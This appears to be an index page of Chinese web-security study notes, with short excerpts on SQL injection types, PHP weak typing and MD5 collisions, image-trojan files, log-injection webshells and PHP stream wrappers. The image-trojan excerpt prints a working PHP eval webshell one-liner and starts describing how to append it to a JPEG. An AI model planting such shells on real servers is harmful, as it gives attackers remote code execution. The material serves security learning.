SQL注入类型及过滤内容判断
测试 SQL 注入是字符型还是数字型的方法 在 SQL 注入测试中,首先需要判断注入点属于数字型还是字符型(字符串型),因为两者的注入语法和闭合方式完全不同。...
基础知识
PHP弱类型和MD5碰撞
一、PHP弱类型比较(松散比较 ==) 1.1 字符串 → 数字转换 原理:字符串与数字 == 时,字符串提取开头的数字(直到非数字),无数字则为0。 积累清单(直...
图片马制作
Linux 下制作图片马 方法1:cat 命令直接拼接(最简单,通用) # 准备一个包含PHP代码的文本文件 shell.php echo '<?php @eval($_POST["cmd"]);?>' > shell.php # 准备一张正常图片 image.jpg # 拼接:图片在前,...
WebShell写入方法
利用日志注入写入 原理:向日志文件写入PHP代码后,包含该日志文件触发代码执行,代码中再写入Webshell到可访问目录。 Web服务器日志注入...
PHP伪协议
一、文件包含漏洞可用 PHP 伪协议 汇总表 伪协议 语法格式 核心功能(文件包含场景) 依赖 / 条件 file:// file://绝对路径 file://相对路径 读取本地文件...